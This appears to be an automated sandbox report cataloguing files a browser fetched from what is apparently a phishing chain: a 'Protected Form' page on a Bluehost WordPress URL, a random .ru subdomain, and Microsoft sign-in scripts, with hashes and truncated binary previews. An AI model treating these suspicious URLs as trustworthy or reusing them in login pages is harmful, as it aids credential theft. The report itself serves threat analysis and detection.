                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (64324), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):351772
                                                            Entropy (8bit):6.044637582070424
                                                            Encrypted:false
                                                            SSDEEP:6144:DODDORezIlikECAtwafzsCNU1W9gor53/OR7uxc6RrA8EvhIajS4qbVw7Tvmcz:DKORVmptw6sCGA9gsJ/OR7VRWeSpRM
                                                            MD5:09A99942C3B2CAB989C8AAE7ED7C5940
                                                            SHA1:C1496DC47CD313F036D4F1B11942F86856CD4E59
                                                            SHA-256:D8D84D19D11ECF643BBDB8E4656A48FA3044010E49499FC0448F9281CE7855A5
                                                            SHA-512:CEF2621E43A466900DF668C8881077F5944BA4ED8AE7CF64C98EA345F6879B84813578B4BAD6473E824CEFBC8A292F293C9C2E1D19E37EB79DF4B85A1897DF39
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsn
                                                            Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="X-Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline';">.. <meta http-equiv="X-Frame-Options" content="DENY">.. <meta http-equiv="X-XSS-Protection" content="1; mode=block">.. <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; form-action 'self';">.. <meta http-equiv="Referrer-Policy" content="strict-origin-when-cross-origin">.. <meta http-equiv="Permissions-Policy" content="geolocation=(), microphone=(), camera=()">.. <title>Protected Form</title>.. <style>.. body {.. font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:very short file (no magic)
                                                            Category:downloaded
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru/aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCK
                                                            Preview:1
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                            Category:dropped
                                                            Size (bytes):1435
                                                            Entropy (8bit):7.8613342322590265
                                                            Encrypted:false
                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                            Category:downloaded
                                                            Size (bytes):116343
                                                            Entropy (8bit):7.997640489040715
                                                            Encrypted:true
                                                            SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                            MD5:3063B0DA40B45B46602FCE99AC53D315
                                                            SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                            SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                            SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):48316
                                                            Entropy (8bit):5.6346993394709
                                                            Encrypted:false
                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:dropped
                                                            Size (bytes):89501
                                                            Entropy (8bit):5.289893677458563
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                            Category:dropped
                                                            Size (bytes):49911
                                                            Entropy (8bit):7.994516776763163
                                                            Encrypted:true
                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):3452
                                                            Entropy (8bit):5.117912766689607
                                                            Encrypted:false
                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://login.live.com/Me.htm?v=3
                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.241202481433726
                                                            Encrypted:false
                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                            Category:downloaded
                                                            Size (bytes):122515
                                                            Entropy (8bit):7.997419459076181
                                                            Encrypted:true
                                                            SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                            MD5:AC9A6ED508328361A4C9530325A94076
                                                            SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                            SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                            SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                            Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                            Category:downloaded
                                                            Size (bytes):621
                                                            Entropy (8bit):7.673946009263606
                                                            Encrypted:false
                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                            Category:dropped
                                                            Size (bytes):122515
                                                            Entropy (8bit):7.997419459076181
                                                            Encrypted:true
                                                            SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                            MD5:AC9A6ED508328361A4C9530325A94076
                                                            SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                            SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                            SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:downloaded
                                                            Size (bytes):89501
                                                            Entropy (8bit):5.289893677458563
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 42 x 21, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):4.068159130770307
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPlglOKkxl/k4E08up:6v/lhP+OKk7Tp
                                                            MD5:2FE53B18BC297082790C4789F372DB25
                                                            SHA1:B7A69D66FD2A1EED4EE888AA258AC7054ADF6247
                                                            SHA-256:195D917DBE8BF60C117F0B2051CBAF63E50C45197E5C5A9EDE2E39073150B122
                                                            SHA-512:30FDE3C53DD25339ADC47455DB5A8116C0A93F13193B5DCF1A197860257F878D599493A140AB068D8B03429DC2DCA91AC7CABD9A87C0F0FD6B6097A07CD6047B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...*............t....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                            Category:downloaded
                                                            Size (bytes):49911
                                                            Entropy (8bit):7.994516776763163
                                                            Encrypted:true
                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                            Category:downloaded
                                                            Size (bytes):5525
                                                            Entropy (8bit):7.961202222662501
                                                            Encrypted:false
